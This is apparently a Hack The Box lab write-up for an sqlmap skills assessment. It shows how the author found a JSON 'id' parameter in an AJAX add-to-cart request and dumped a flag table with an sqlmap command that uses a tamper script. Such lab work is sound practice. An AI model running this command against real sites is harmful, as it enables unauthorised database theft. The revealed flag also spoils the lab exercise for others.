SQLMap - Skills Assessment

- 2 mins read

Introduction

sqlmap is an open-source penetration testing tool designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications. It supports a wide range of SQL injection techniques, including boolean-based, time-based, error-based, and UNION query-based attacks.

The goal of this module is to introduce us into the tool and how it is useful in real-world scenarios where SQLi is feasible. That’s why in this writeup the key is in finding the vulnerable parameter.

Enumeration

This one was kind of easy, the hard part was to find where to do the SQL Injection

They gave us a basic and static shop website.

image.png

Here we could find some forms where one would expect some kind of injection, but It wasn’t the case

image.png

Eventually, I found some weird <script> code inside cart.html, thus I decided to keep looking for this kind of scripts on the other pages, and it was then that I found the following in shop.html

<script>
    $(".add-to-cart").click(function(event) {
        event.preventDefault();

        let xhr = new XMLHttpRequest();
        let url = "action.php";

        xhr.open("POST", url, true);
        xhr.setRequestHeader("Content-Type", "application/json");

        xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 200) {
                alert("Item added!!!")
            }
        };

        var data = JSON.stringify({ "id": 1 });
        xhr.send(data);
    });
  </script>

This JavaScript function adds an item to a cart when an element with the class .add-to-cart is clicked. It uses AJAX with a raw XMLHttpRequest to send data to the server asynchronously. So, when we clicked the “Add to cart” button, an HTTP message poped up saying

image.png

Analyzing add item to cart request

Then, I used Burp to analyse the request and this was the one

POST /action.php HTTP/1.1
Host: 94.237.59.188:34267
Content-Length: 8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Sec-GPC: 1
Accept-Language: en-US,en
Origin: http://94.237.59.188:34267
Referer: http://94.237.59.188:34267/shop.html
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"id":1}

## SQLi against id parameter

My next step then was to attempt an sql injection to that id JSON parameter using sqlmap and between as tamper

sqlmap -r req.txt --batch --dump -T final_flag --tamper=between

The result was successful. Not so hard right?!

image.png

HTB{sqlmap_finished!}